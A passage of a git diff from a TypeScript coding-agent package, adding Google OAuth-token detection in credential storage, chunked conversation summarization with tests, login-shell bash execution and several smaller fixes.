@@ -1998,6 +2036,11 @@ export class AgentSession {
 					const messages = this.agent.state.messages;
 					const last = messages[messages.length - 1];
 					if (last?.role === "assistant" && (last as AssistantMessage).stopReason === "error") {
+						// If the error was an image dimension overflow, downsize images
+						// before retrying so the retry doesn't hit the same error (#2874)
+						if (isImageDimensionError((last as AssistantMessage).errorMessage)) {
+							downsizeConversationImages(messages as Message[]);
+						}
 						this.agent.replaceMessages(messages.slice(0, -1));
 						this.agent.continue().catch((err) => {
 							runner.emitError({
@@ -2026,8 +2069,7 @@ export class AgentSession {
 				refreshTools: () => this._refreshToolRegistry(),
 				getCommands,
 				setModel: async (model, options) => {
-					const key = await this.modelRegistry.getApiKey(model, this.sessionId);
-					if (!key) return false;
+					if (!this.modelRegistry.isProviderRequestReady(model.provider)) return false;
 					await this.setModel(model, options);
 					return true;
 				},
@@ -2250,7 +2292,7 @@ export class AgentSession {
 	async executeBash(
 		command: string,
 		onChunk?: (chunk: string) => void,
-		options?: { excludeFromContext?: boolean; operations?: BashOperations },
+		options?: { excludeFromContext?: boolean; operations?: BashOperations; loginShell?: boolean },
 	): Promise<BashResult> {
 		this._bashAbortController = new AbortController();
 
@@ -2267,6 +2309,7 @@ export class AgentSession {
 				: await executeBashCommand(resolvedCommand, {
 						onChunk,
 						signal: this._bashAbortController.signal,
+						loginShell: options?.loginShell,
 					});
 
 			this.recordBashResult(command, result, options);
@@ -2597,10 +2640,10 @@ export class AgentSession {
 		let summaryDetails: unknown;
 		if (options.summarize && entriesToSummarize.length > 0 && !extensionSummary) {
 			const model = this.model!;
-			const apiKey = await this._modelRegistry.getApiKey(model, this.sessionId);
-			if (!apiKey) {
+			if (!this._modelRegistry.isProviderRequestReady(model.provider)) {
 				throw new Error(`No API key for ${model.provider}`);
 			}
+			const apiKey = await this._modelRegistry.getApiKey(model, this.sessionId);
 			const branchSummarySettings = this.settingsManager.getBranchSummarySettings();
 			const result = await generateBranchSummary(entriesToSummarize, {
 				model,
@@ -2774,6 +2817,14 @@ export class AgentSession {
 		};
 	}
 
+	/**
+	 * Get the cost of the most recent assistant response.
+	 * Returns 0 if no assistant message has been received yet.
+	 */
+	getLastTurnCost(): number {
+		return this._lastTurnCost;
+	}
+
 	getContextUsage(): ContextUsage | undefined {
 		const model = this.model;
 		if (!model) return undefined;
diff --git a/packages/pi-coding-agent/src/core/auth-storage.test.ts b/packages/pi-coding-agent/src/core/auth-storage.test.ts
index f91947ca9..a0d2cab20 100644
--- a/packages/pi-coding-agent/src/core/auth-storage.test.ts
+++ b/packages/pi-coding-agent/src/core/auth-storage.test.ts
@@ -263,6 +263,152 @@ describe("AuthStorage — areAllCredentialsBackedOff", () => {
 	});
 });
 
+// ─── mismatched oauth credential for non-OAuth provider (#2083) ───────────────
+
+describe("AuthStorage — oauth credential for non-OAuth provider (#2083)", () => {
+	it("returns undefined when openrouter has type:oauth (no registered OAuth provider)", async (t) => {
+		// Simulates the bug: OpenRouter credential stored as type:"oauth"
+		// but OpenRouter is not a registered OAuth provider.
+		const storage = inMemory({
+			openrouter: {
+				type: "oauth",
+				access_token: "sk-or-v1-fake",
+				refresh_token: "rt-fake",
+				expires: Date.now() + 3_600_000,
+			},
+		});
+
+		// Isolate from any real OPENROUTER_API_KEY in the environment so the
+		// fall-through to env / fallback finds nothing and returns undefined.
+		const origEnv = process.env.OPENROUTER_API_KEY;
+		delete process.env.OPENROUTER_API_KEY;
+		t.after(() => {
+			if (origEnv === undefined) {
+				delete process.env.OPENROUTER_API_KEY;
+			} else {
+				process.env.OPENROUTER_API_KEY = origEnv;
+			}
+		});
+
+		// Before the fix, getApiKey returns undefined because
+		// resolveCredentialApiKey calls getOAuthProvider("openrouter") → null → undefined.
+		// The key in the oauth credential is never extracted.
+		const key = await storage.getApiKey("openrouter");
+		// After the fix, the oauth credential with an unrecognised provider
+		// should be skipped, and getApiKey should fall through to env / fallback.
+		// With no env var and no fallback resolver configured, the result is undefined.
+		assert.equal(key, undefined);
+	});
+
+	it("falls through to env var when openrouter has type:oauth credential", async (t) => {
+		const storage = inMemory({
+			openrouter: {
+				type: "oauth",
+				access_token: "sk-or-v1-fake",
+				refresh_token: "rt-fake",
+				expires: Date.now() + 3_600_000,
+			},
+		});
+
+		// Simulate OPENROUTER_API_KEY being set via env
+		const origEnv = process.env.OPENROUTER_API_KEY;
+		t.after(() => {
+			if (origEnv === undefined) {
+				delete process.env.OPENROUTER_API_KEY;
+			} else {
+				process.env.OPENROUTER_API_KEY = origEnv;
+			}
+		});
+
+		process.env.OPENROUTER_API_KEY = "sk-or-v1-env-key";
+		const key = await storage.getApiKey("openrouter");
+		assert.equal(key, "sk-or-v1-env-key");
+	});
+
+	it("falls through to fallback resolver when openrouter has type:oauth credential", async (t) => {
+		const storage = inMemory({
+			openrouter: {
+				type: "oauth",
+				access_token: "sk-or-v1-fake",
+				refresh_token: "rt-fake",
+				expires: Date.now() + 3_600_000,
+			},
+		});
+
+		// Isolate from any real OPENROUTER_API_KEY so env fallback is skipped
+		// and the fallback resolver is reached.
+		const origEnv = process.env.OPENROUTER_API_KEY;
+		delete process.env.OPENROUTER_API_KEY;
+		t.after(() => {
+			if (origEnv === undefined) {
+				delete process.env.OPENROUTER_API_KEY;
+			} else {
+				process.env.OPENROUTER_API_KEY = origEnv;
+			}
+		});
+
+		storage.setFallbackResolver((provider) =>
+			provider === "openrouter" ? "sk-or-v1-fallback" : undefined,
+		);
+
+		const key = await storage.getApiKey("openrouter");
+		assert.equal(key, "sk-or-v1-fallback");
+	});
+});
+
+// ─── Gemini CLI OAuth token detection ─────────────────────────────────────────
+
+describe("AuthStorage — Gemini CLI OAuth token detection", () => {
+	it("rejects Google OAuth access token (ya29. prefix) stored as api_key for google provider", () => {
+		const storage = inMemory({});
+		assert.throws(
+			() => storage.set("google", makeKey("ya29.a0ARrdaM_fake_oauth_token_from_gemini_cli")),
+			(err: Error) => {
+				assert.ok(err.message.includes("OAuth access token"), `Expected message about OAuth token, got: ${err.message}`);
+				assert.ok(
+					err.message.includes("GEMINI_API_KEY") || err.message.includes("google-gemini-cli"),
+					`Expected guidance about GEMINI_API_KEY or google-gemini-cli, got: ${err.message}`,
+				);
+				return true;
+			},
+		);
+	});
+
+	it("rejects Google OAuth access token for google provider via getApiKey when set as env var", async () => {
+		const storage = inMemory({});
+		// Simulate runtime override with OAuth token
+		storage.setRuntimeApiKey("google", "ya29.c.b0AXv0zTPQ_fake_oauth_token");
+		const key = await storage.getApiKey("google");
+		// Should return undefined (blocked) or throw
+		assert.equal(key, undefined, "OAuth token should be blocked for google provider");
+	});
+
+	it("allows legitimate Google API keys (AIza prefix) for google provider", () => {
+		const storage = inMemory({});
+		storage.set("google", makeKey("AIzaSyD_fake_legitimate_api_key_here"));
+		const creds = storage.getCredentialsForProvider("google");
+		assert.equal(creds.length, 1);
+	});
+
+	it("allows ya29 tokens for google-gemini-cli provider (OAuth is expected there)", () => {
+		// google-gemini-cli stores OAuth credentials with type: "oauth", not "api_key"
+		// But if someone somehow stored an api_key, it shouldn't be blocked for OAuth providers
+		const storage = inMemory({});
+		storage.set("google-gemini-cli", makeKey("ya29.a0ARrdaM_token_for_gemini_cli"));
+		const creds = storage.getCredentialsForProvider("google-gemini-cli");
+		assert.equal(creds.length, 1);
+	});
+
+	it("rejects Google OAuth token (ya29. prefix) for openai provider that uses GEMINI_API_KEY indirectly", () => {
+		// Only google provider should be blocked, not others
+		const storage = inMemory({});
+		// This should NOT throw - other providers can have whatever keys they want
+		storage.set("openai", makeKey("ya29.some_value"));
+		const creds = storage.getCredentialsForProvider("openai");
+		assert.equal(creds.length, 1);
+	});
+});
+
 // ─── getAll truncation ────────────────────────────────────────────────────────
 
 describe("AuthStorage — getAll()", () => {
diff --git a/packages/pi-coding-agent/src/core/auth-storage.ts b/packages/pi-coding-agent/src/core/auth-storage.ts
index e921328f2..fb1532252 100644
--- a/packages/pi-coding-agent/src/core/auth-storage.ts
+++ b/packages/pi-coding-agent/src/core/auth-storage.ts
@@ -34,6 +34,46 @@ export type OAuthCredential = {
 
 export type AuthCredential = ApiKeyCredential | OAuthCredential;
 
+// ============================================================================
+// Google OAuth token detection
+// ============================================================================
+
+/**
+ * Providers that use Google AI Studio API keys (not OAuth tokens).
+ * OAuth access tokens (ya29.*) are not valid API keys for these providers.
+ */
+const GOOGLE_API_KEY_PROVIDERS = new Set(["google"]);
+
+/**
+ * Detect if a string is a Google OAuth access token rather than an API key.
+ * Google OAuth access tokens start with "ya29." — these are issued by
+ * Google's OAuth2 token endpoint and are not valid as AI Studio API keys.
+ *
+ * Users who installed Google's Gemini CLI may have these tokens and
+ * mistakenly set them as GEMINI_API_KEY.
+ */
+export function isGoogleOAuthToken(key: string): boolean {
+	return key.startsWith("ya29.");
+}
+
+/**
+ * Validate that an API key is not a Google OAuth token being used for
+ * a provider that requires actual API keys (e.g., Google AI Studio).
+ * Throws a descriptive error if the key appears to be an OAuth token.
+ */
+function validateNotGoogleOAuthToken(provider: string, key: string): void {
+	if (GOOGLE_API_KEY_PROVIDERS.has(provider) && isGoogleOAuthToken(key)) {
+		throw new Error(
+			`The provided key for "${provider}" appears to be a Google OAuth access token (ya29.*), ` +
+				`not a valid API key. Google AI Studio requires an API key starting with "AIza...". ` +
+				`\n\nIf you're using Google's Gemini CLI, its OAuth tokens are not compatible. ` +
+				`Either:\n` +
+				`  1. Get an API key from https://aistudio.google.com/apikey and set GEMINI_API_KEY\n` +
+				`  2. Use '/login google-gemini-cli' to authenticate via Cloud Code Assist`,
+		);
+	}
+}
+
 /**
  * On-disk format: each provider maps to a single credential or an array of credentials.
  * Single credentials are normalized to arrays at load time for internal use.
@@ -202,6 +242,7 @@ export class AuthStorage {
 	private fallbackResolver?: (provider: string) => string | undefined;
 	private loadError: Error | null = null;
 	private errors: Error[] = [];
+	private credentialChangeListeners: Set<() => void> = new Set();
 
 	/**
 	 * Round-robin index per provider. Incremented on each call to getApiKey
@@ -263,6 +304,25 @@ export class AuthStorage {
 		this.fallbackResolver = resolver;
 	}
 
+	/**
+	 * Register a callback to be notified when credentials change (e.g., after OAuth token refresh).
+	 * Returns a function to unregister the listener.
+	 */
+	onCredentialChange(listener: () => void): () => void {
+		this.credentialChangeListeners.add(listener);
+		return () => this.credentialChangeListeners.delete(listener);
+	}
+
+	private notifyCredentialChange(): void {
+		for (const listener of this.credentialChangeListeners) {
+			try {
+				listener();
+			} catch {
+				// Don't let listener errors break the refresh flow
+			}
+		}
+	}
+
 	private recordError(error: unknown): void {
 		const normalizedError = error instanceof Error ? error : new Error(String(error));
 		this.errors.push(normalizedError);
@@ -340,6 +400,9 @@ export class AuthStorage {
 	 */
 	set(provider: string, credential: AuthCredential): void {
 		if (credential.type === "api_key") {
+			// Block Google OAuth tokens being stored as API keys for AI Studio providers
+			validateNotGoogleOAuthToken(provider, credential.key);
+
 			const existing = this.getCredentialsForProvider(provider);
 			// Deduplicate: don't add if same key already exists
 			const isDuplicate = existing.some(
@@ -667,6 +730,11 @@ export class AuthStorage {
 			return { result: refreshed, next: JSON.stringify(merged, null, 2) };
 		});
 
+		// Notify listeners after credential change (e.g., model registry refresh)
+		if (result) {
+			queueMicrotask(() => this.notifyCredentialChange());
+		}
+
 		return result;
 	}
 
@@ -719,10 +787,34 @@ export class AuthStorage {
 	 * @param providerId - The provider to get an API key for
 	 * @param sessionId - Optional session ID for sticky credential selection
 	 */
-	async getApiKey(providerId: string, sessionId?: string): Promise<string | undefined> {
+	async getApiKey(providerId: string, sessionId?: string, options?: { baseUrl?: string }): Promise<string | undefined> {
+		// If the model has a local baseUrl, return a dummy key to avoid auth blocking
+		if (options?.baseUrl) {
+			try {
+				const hostname = new URL(options.baseUrl).hostname;
+				if (hostname === "localhost" || hostname === "127.0.0.1" || hostname === "0.0.0.0" || hostname === "::1") {
+					return "local-no-key-needed";
+				}
+			} catch {
+				if (options.baseUrl.startsWith("unix:")) {
+					return "local-no-key-needed";
+				}
+			}
+		}
+
 		// Runtime override takes highest priority
 		const runtimeKey = this.runtimeOverrides.get(providerId);
 		if (runtimeKey) {
+			// Block Google OAuth tokens used as runtime API key overrides
+			if (GOOGLE_API_KEY_PROVIDERS.has(providerId) && isGoogleOAuthToken(runtimeKey)) {
+				this.recordError(
+					new Error(
+						`Blocked Google OAuth access token (ya29.*) for provider "${providerId}". ` +
+							`Use an API key from https://aistudio.google.com/apikey or '/login google-gemini-cli'.`,
+					),
+				);
+				return undefined;
+			}
 			return runtimeKey;
 		}
 
@@ -731,14 +823,29 @@ export class AuthStorage {
 		if (credentials.length > 0) {
 			const index = this.selectCredentialIndex(providerId, credentials, sessionId);
 			if (index >= 0) {
-				return this.resolveCredentialApiKey(providerId, credentials[index]);
+				const resolved = await this.resolveCredentialApiKey(providerId, credentials[index]);
+				if (resolved) return resolved;
+				// Credential unresolvable (e.g. type:"oauth" for a non-OAuth provider) —
+				// fall through to env / fallback instead of returning undefined (#2083)
 			}
-			// All credentials backed off - fall through to env/fallback
+			// All credentials backed off or unresolvable - fall through to env/fallback
 		}
 
 		// Fall back to environment variable
 		const envKey = getEnvApiKey(providerId);
-		if (envKey) return envKey;
+		if (envKey) {
+			// Block Google OAuth tokens from environment variables (e.g., GEMINI_API_KEY=ya29.*)
+			if (GOOGLE_API_KEY_PROVIDERS.has(providerId) && isGoogleOAuthToken(envKey)) {
+				this.recordError(
+					new Error(
+						`GEMINI_API_KEY contains a Google OAuth access token (ya29.*), not an API key. ` +
+							`Get an API key from https://aistudio.google.com/apikey or use '/login google-gemini-cli'.`,
+					),
+				);
+				return undefined;
+			}
+			return envKey;
+		}
 
 		// Fall back to custom resolver (e.g., models.json custom providers)
 		return this.fallbackResolver?.(providerId) ?? undefined;
diff --git a/packages/pi-coding-agent/src/core/bash-executor.ts b/packages/pi-coding-agent/src/core/bash-executor.ts
index 3931a7a25..f043b9379 100644
--- a/packages/pi-coding-agent/src/core/bash-executor.ts
+++ b/packages/pi-coding-agent/src/core/bash-executor.ts
@@ -76,11 +76,23 @@ export interface BashResult {
  * @param options - Optional streaming callback and abort signal
  * @returns Promise resolving to execution result
  */
-export function executeBash(command: string, options?: BashExecutorOptions): Promise<BashResult> {
+export function executeBash(command: string, options?: BashExecutorOptions & { loginShell?: boolean }): Promise<BashResult> {
 	return new Promise((resolve, reject) => {
-		const { shell, args } = getShellConfig();
+		let shell: string;
+		let args: string[];
+		if (options?.loginShell) {
+			// Use the user's login shell with -l for PATH/env from shell profiles
+			shell = process.env.SHELL || "/bin/bash";
+			args = ["-l", "-c"];
+		} else {
+			({ shell, args } = getShellConfig());
+		}
+		// On Windows, detached: true sets CREATE_NEW_PROCESS_GROUP which can
+		// cause EINVAL in VSCode/ConPTY terminal contexts.  The bg-shell
+		// extension already guards this (process-manager.ts); align here.
+		// Process-tree cleanup uses taskkill /F /T on Windows regardless.
 		const child: ChildProcess = spawn(shell, [...args, sanitizeCommand(command)], {
-			detached: true,
+			detached: process.platform !== "win32",
 			env: getShellEnv(),
 			stdio: ["ignore", "pipe", "pipe"],
 		});
diff --git a/packages/pi-coding-agent/src/core/blob-store.ts b/packages/pi-coding-agent/src/core/blob-store.ts
index 16262c892..9ad9e4f49 100644
--- a/packages/pi-coding-agent/src/core/blob-store.ts
+++ b/packages/pi-coding-agent/src/core/blob-store.ts
@@ -6,7 +6,7 @@
  * provides automatic deduplication across sessions.
  */
 import { createHash } from "node:crypto";
-import { mkdirSync, readdirSync, readFileSync, writeFileSync, existsSync, accessSync, unlinkSync, statSync } from "node:fs";
+import { mkdirSync, readdirSync, readFileSync, writeFileSync, accessSync, unlinkSync, statSync } from "node:fs";
 import { join } from "node:path";
 
 const BLOB_PREFIX = "blob:sha256:";
@@ -37,8 +37,11 @@ export class BlobStore {
 			},
 		};
 
-		if (!existsSync(blobPath)) {
-			writeFileSync(blobPath, data);
+		try {
+			writeFileSync(blobPath, data, { flag: "wx" }); // Atomic: fails if file exists
+		} catch (err: any) {
+			if (err.code !== "EEXIST") throw err;
+			// File already exists — expected for content-addressed storage
 		}
 		return result;
 	}
diff --git a/packages/pi-coding-agent/src/core/compaction-orchestrator.ts b/packages/pi-coding-agent/src/core/compaction-orchestrator.ts
index 6415f8098..c17de356c 100644
--- a/packages/pi-coding-agent/src/core/compaction-orchestrator.ts
+++ b/packages/pi-coding-agent/src/core/compaction-orchestrator.ts
@@ -94,10 +94,11 @@ export class CompactionOrchestrator {
 				throw new Error("No model selected");
 			}
 
-			const apiKey = await this._deps.modelRegistry.getApiKey(model, this._deps.getSessionId());
-			if (!apiKey) {
+			if (!this._deps.modelRegistry.isProviderRequestReady(model.provider)) {
 				throw new Error(`No API key for ${model.provider}`);
 			}
+			// undefined for externalCli/none providers — stripped at the streamSimple boundary (model-registry.ts)
+			const apiKey = await this._deps.modelRegistry.getApiKey(model, this._deps.getSessionId());
 
 			const pathEntries = this._deps.sessionManager.getBranch();
 			const settings = this._deps.settingsManager.getCompactionSettings();
@@ -299,11 +300,12 @@ export class CompactionOrchestrator {
 				return;
 			}
 
-			const apiKey = await this._deps.modelRegistry.getApiKey(model, this._deps.getSessionId());
-			if (!apiKey) {
+			if (!this._deps.modelRegistry.isProviderRequestReady(model.provider)) {
 				this._deps.emit({ type: "auto_compaction_end", result: undefined, aborted: false, willRetry: false });
 				return;
 			}
+			// undefined for externalCli/none providers — stripped at the streamSimple boundary (model-registry.ts)
+			const apiKey = await this._deps.modelRegistry.getApiKey(model, this._deps.getSessionId());
 
 			const pathEntries = this._deps.sessionManager.getBranch();
 			const preparation = prepareCompaction(pathEntries, settings);
diff --git a/packages/pi-coding-agent/src/core/compaction/branch-summarization.ts b/packages/pi-coding-agent/src/core/compaction/branch-summarization.ts
index c028dbbd8..cf9c8bc01 100644
--- a/packages/pi-coding-agent/src/core/compaction/branch-summarization.ts
+++ b/packages/pi-coding-agent/src/core/compaction/branch-summarization.ts
@@ -64,8 +64,8 @@ export interface CollectEntriesResult {
 export interface GenerateBranchSummaryOptions {
 	/** Model to use for summarization */
 	model: Model<any>;
-	/** API key for the model */
-	apiKey: string;
+	/** API key for the model. Undefined for externalCli/none providers. */
+	apiKey: string | undefined;
 	/** Abort signal for cancellation */
 	signal: AbortSignal;
 	/** Optional custom instructions for summarization */
diff --git a/packages/pi-coding-agent/src/core/compaction/compaction.test.ts b/packages/pi-coding-agent/src/core/compaction/compaction.test.ts
new file mode 100644
index 000000000..1fb5a2db2
--- /dev/null
+++ b/packages/pi-coding-agent/src/core/compaction/compaction.test.ts
@@ -0,0 +1,236 @@
+/**
+ * Tests for chunked compaction fallback when messages exceed model context window.
+ * Regression test for #2932.
+ */
+
+import assert from "node:assert/strict";
+import { describe, it, mock } from "node:test";
+
+import type { AgentMessage } from "@gsd/pi-agent-core";
+import type { Model, AssistantMessage } from "@gsd/pi-ai";
+
+import { generateSummary, estimateTokens, chunkMessages } from "./compaction.js";
+
+// ---------------------------------------------------------------------------
+// Helpers
+// ---------------------------------------------------------------------------
+
+/** Create a user message with approximately `tokenCount` tokens (chars = tokens * 4). */
+function makeUserMessage(tokenCount: number): AgentMessage {
+	const text = "x".repeat(tokenCount * 4);
+	return { role: "user", content: text } as unknown as AgentMessage;
+}
+
+/** Create a mock model with a given context window. */
+function makeModel(contextWindow: number): Model<any> {
+	return {
+		id: "test-model",
+		name: "Test Model",
+		api: "anthropic-messages",
+		provider: "anthropic",
+		baseUrl: "https://api.test",
+		reasoning: false,
+		input: ["text"],
+		cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 },
+		contextWindow,
+		maxTokens: 4096,
+	} as Model<any>;
+}
+
+function makeFakeResponse(text: string): AssistantMessage {
+	return {
+		content: [{ type: "text", text }],
+		stopReason: "end_turn",
+	} as unknown as AssistantMessage;
+}
+
+// ---------------------------------------------------------------------------
+// chunkMessages tests
+// ---------------------------------------------------------------------------
+
+describe("chunkMessages", () => {
+	it("returns a single chunk when messages fit in budget", () => {
+		const messages: AgentMessage[] = [
+			makeUserMessage(1_000),
+			makeUserMessage(1_000),
+		];
+		const chunks = chunkMessages(messages, 100_000);
+		assert.equal(chunks.length, 1);
+		assert.equal(chunks[0].length, 2);
+	});
+
+	it("splits messages into multiple chunks when they exceed budget", () => {
+		const messages: AgentMessage[] = [
+			makeUserMessage(50_000),
+			makeUserMessage(50_000),
+			makeUserMessage(50_000),
+		];
+		// Budget of 80k tokens means each 50k message gets its own chunk
+		// (or two fit together if budget allows)
+		const chunks = chunkMessages(messages, 80_000);
+		assert.ok(chunks.length > 1, `Expected multiple chunks, got ${chunks.length}`);
+		// All messages should be present across chunks
+		const totalMessages = chunks.reduce((sum, c) => sum + c.length, 0);
+		assert.equal(totalMessages, 3);
+	});
+
+	it("puts a single oversized message in its own chunk", () => {
+		const messages: AgentMessage[] = [
+			makeUserMessage(200_000), // Way over any reasonable budget
+		];
+		const chunks = chunkMessages(messages, 80_000);
+		assert.equal(chunks.length, 1);
+		assert.equal(chunks[0].length, 1);
+	});
+
+	it("preserves message order across chunks", () => {
+		// Create messages with identifiable sizes
+		const messages: AgentMessage[] = [
+			makeUserMessage(30_000), // ~30k tokens
+			makeUserMessage(30_000),
+			makeUserMessage(30_000),
+			makeUserMessage(30_000),
+		];
+		const chunks = chunkMessages(messages, 50_000);
+		// Reconstruct original order
+		const flat = chunks.flat();
+		assert.equal(flat.length, 4);
+		for (let i = 0; i < flat.length; i++) {
+			assert.strictEqual(flat[i], messages[i], `Message ${i} should be in order`);
+		}
+	});
+});
+
+// ---------------------------------------------------------------------------
+// generateSummary chunked fallback tests
+// ---------------------------------------------------------------------------
+
+describe("generateSummary — chunked fallback (#2932)", () => {
+	it("calls _completeFn multiple times when messages exceed model context window", async () => {
+		// Arrange: 3 messages of ~80k tokens each = ~240k total, model has 200k window
+		const messages: AgentMessage[] = [
+			makeUserMessage(80_000),
+			makeUserMessage(80_000),
+			makeUserMessage(80_000),
+		];
+		const model = makeModel(200_000);
+		const reserveTokens = 16_384;
+
+		// Verify our test setup: messages really do exceed the model window
+		let totalTokens = 0;
+		for (const m of messages) totalTokens += estimateTokens(m);
+		assert.ok(
+			totalTokens > model.contextWindow,
+			`Test setup: ${totalTokens} tokens should exceed ${model.contextWindow} context window`,
+		);
+
+		// Track calls
+		const calls: string[] = [];
+		const mockComplete = mock.fn(async (_model: any, context: any, _options: any) => {
+			const userMsg = context.messages?.[0];
+			const text =
+				typeof userMsg?.content === "string"
+					? userMsg.content
+					: userMsg?.content?.[0]?.text ?? "";
+
+			if (text.includes("<previous-summary>")) {
+				calls.push("update");
+			} else {
+				calls.push("initial");
+			}
+			return makeFakeResponse("Summary of chunk");
+		});
+
+		const summary = await generateSummary(
+			messages,
+			model,
+			reserveTokens,
+			undefined, // apiKey
+			undefined, // signal
+			undefined, // customInstructions
+			undefined, // previousSummary
+			mockComplete, // _completeFn override for testing
+		);
+
+		// Assert: should have called completeSimple more than once (chunked)
+		assert.ok(
+			mockComplete.mock.callCount() > 1,
+			`Expected multiple calls for chunked summarization, got ${mockComplete.mock.callCount()}`,
+		);
+
+		// First call should be an initial summary, subsequent should be updates
+		assert.equal(calls[0], "initial", "First chunk should use initial summarization prompt");
+		for (let i = 1; i < calls.length; i++) {
+			assert.equal(calls[i], "update", `Chunk ${i + 1} should use update summarization prompt`);
+		}
+
+		// Should return a non-empty summary
+		assert.ok(summary.length > 0, "Summary should not be empty");
+	});
+
+	it("uses single-pass when messages fit within model context window", async () => {
+		const messages: AgentMessage[] = [
+			makeUserMessage(10_000),
+			makeUserMessage(10_000),
+		];
+		const model = makeModel(200_000);
+		const reserveTokens = 16_384;
+
+		// Verify test setup
+		let totalTokens = 0;
+		for (const m of messages) totalTokens += estimateTokens(m);
+		assert.ok(
+			totalTokens < model.contextWindow,
+			`Test setup: ${totalTokens} tokens should fit in ${model.contextWindow} context window`,
+		);
+
+		const mockComplete = mock.fn(async () => makeFakeResponse("Single pass summary"));
+
+		await generateSummary(messages, model, reserveTokens, undefined, undefined, undefined, undefined, mockComplete);
+
+		assert.equal(
+			mockComplete.mock.callCount(),
+			1,
+			"Should use single-pass summarization when messages fit in context window",
+		);
+	});
+
+	it("passes previousSummary through chunked summarization", async () => {
+		const messages: AgentMessage[] = [
+			makeUserMessage(80_000),
+			makeUserMessage(80_000),
+			makeUserMessage(80_000),
+		];
+		const model = makeModel(200_000);
+		const reserveTokens = 16_384;
+		const previousSummary = "Previous session summary content";
+
+		const prompts: string[] = [];
+		const mockComplete = mock.fn(async (_model: any, context: any) => {
+			const userMsg = context.messages?.[0];
+			const text =
+				typeof userMsg?.content === "string"
+					? userMsg.content
+					: userMsg?.content?.[0]?.text ?? "";
+			prompts.push(text);
+			return makeFakeResponse("Chunk summary");
+		});
+
+		await generateSummary(
+			messages,
+			model,
+			reserveTokens,
+			undefined,
+			undefined,
+			undefined,
+			previousSummary,
+			mockComplete,
+		);
+
+		// First chunk should include the previousSummary
+		assert.ok(
+			prompts[0].includes(previousSummary),
+			"First chunk should incorporate the previousSummary",
+		);
+	});
+});
diff --git a/packages/pi-coding-agent/src/core/compaction/compaction.ts b/packages/pi-coding-agent/src/core/compaction/compaction.ts
index 13e00a6d1..cd3183277 100644
--- a/packages/pi-coding-agent/src/core/compaction/compaction.ts
+++ b/packages/pi-coding-agent/src/core/compaction/compaction.ts
@@ -489,18 +489,111 @@ Use this EXACT format:
 
 Keep each section concise. Preserve exact file paths, function names, and error messages.`;
 
+/**
+ * Split messages into chunks where each chunk's estimated token count
+ * stays within `maxTokensPerChunk`. A single message that exceeds the
+ * budget is placed alone in its own chunk (never dropped).
+ */
+export function chunkMessages(messages: AgentMessage[], maxTokensPerChunk: number): AgentMessage[][] {
+	const chunks: AgentMessage[][] = [];
+	let currentChunk: AgentMessage[] = [];
+	let currentTokens = 0;
+
+	for (const msg of messages) {
+		const msgTokens = estimateTokens(msg);
+
+		if (currentChunk.length > 0 && currentTokens + msgTokens > maxTokensPerChunk) {
+			// Current chunk is full — start a new one
+			chunks.push(currentChunk);
+			currentChunk = [msg];
+			currentTokens = msgTokens;
+		} else {
+			currentChunk.push(msg);
+			currentTokens += msgTokens;
+		}
+	}
+
+	if (currentChunk.length > 0) {
+		chunks.push(currentChunk);
+	}
+
+	return chunks;
+}
+
+/** Type for the completion function, allowing injection for tests. */
+type CompleteFn = typeof completeSimple;
+
 /**
  * Generate a summary of the conversation using the LLM.
  * If previousSummary is provided, uses the update prompt to merge.
+ *
+ * When the messages exceed the model's context window, automatically
+ * falls back to chunked summarization: summarize the first chunk,
+ * then iteratively merge subsequent chunks using the update prompt.
+ *
+ * @param _completeFn - Internal override for testing; defaults to completeSimple.
  */
 export async function generateSummary(
 	currentMessages: AgentMessage[],
 	model: Model<any>,
 	reserveTokens: number,
-	apiKey: string,
+	apiKey: string | undefined,
 	signal?: AbortSignal,
 	customInstructions?: string,
 	previousSummary?: string,
+	_completeFn?: CompleteFn,
+): Promise<string> {
+	const complete = _completeFn ?? completeSimple;
+
+	// Estimate total tokens for the messages to summarize
+	let totalTokens = 0;
+	for (const msg of currentMessages) {
+		totalTokens += estimateTokens(msg);
+	}
+
+	// Overhead for the prompt framing, system prompt, and response budget
+	const promptOverhead = 4_000;
+	const maxTokens = Math.floor(0.8 * reserveTokens);
+	const maxInputTokens = (model.contextWindow || 200_000) - reserveTokens - promptOverhead;
+
+	// If messages fit in the context window, use single-pass summarization
+	if (totalTokens <= maxInputTokens) {
+		return singlePassSummary(currentMessages, model, reserveTokens, apiKey, signal, customInstructions, previousSummary, complete);
+	}
+
+	// Chunked fallback: split messages and iteratively summarize
+	const chunks = chunkMessages(currentMessages, maxInputTokens);
+	let runningSummary = previousSummary;
+
+	for (let i = 0; i < chunks.length; i++) {
+		runningSummary = await singlePassSummary(
+			chunks[i],
+			model,
+			reserveTokens,
+			apiKey,
+			signal,
+			customInstructions,
+			runningSummary,
+			complete,
+		);
+	}
+
+	return runningSummary!;
+}
+
+/**
+ * Single-pass summarization of messages using the LLM.
+ * If previousSummary is provided, uses the update prompt to merge.
+ */
+async function singlePassSummary(
+	currentMessages: AgentMessage[],
+	model: Model<any>,
+	reserveTokens: number,
+	apiKey: string | undefined,
+	signal?: AbortSignal,
+	customInstructions?: string,
+	previousSummary?: string,
+	complete: CompleteFn = completeSimple,
 ): Promise<string> {
 	const maxTokens = Math.floor(0.8 * reserveTokens);
 
@@ -526,7 +619,7 @@ export async function generateSummary(
 		? { maxTokens, signal, apiKey, reasoning: "high" as const }
 		: { maxTokens, signal, apiKey };
 
-	const response = await completeSimple(
+	const response = await complete(
 		model,
 		{ systemPrompt: SUMMARIZATION_SYSTEM_PROMPT, messages: createSummarizationMessage(promptText) },
 		completionOptions,
@@ -660,7 +753,7 @@ Be concise. Focus on what's needed to understand the kept suffix.`;
 export async function compact(
 	preparation: CompactionPreparation,
 	model: Model<any>,
-	apiKey: string,
+	apiKey: string | undefined,
 	customInstructions?: string,
 	signal?: AbortSignal,
 ): Promise<CompactionResult> {
@@ -732,7 +825,7 @@ async function generateTurnPrefixSummary(
 	messages: AgentMessage[],
 	model: Model<any>,
 	reserveTokens: number,
-	apiKey: string,
+	apiKey: string | undefined,
 	signal?: AbortSignal,
 ): Promise<string> {
 	const maxTokens = Math.floor(0.5 * reserveTokens); // Smaller budget for turn prefix
diff --git a/packages/pi-coding-agent/src/core/discovery-cache.ts b/packages/pi-coding-agent/src/core/discovery-cache.ts
index a75633c2f..d9d9bded8 100644
--- a/packages/pi-coding-agent/src/core/discovery-cache.ts
+++ b/packages/pi-coding-agent/src/core/discovery-cache.ts
@@ -3,7 +3,7 @@
  * Stores results at {agentDir}/discovery-cache.json with per-provider TTLs.
  */
 
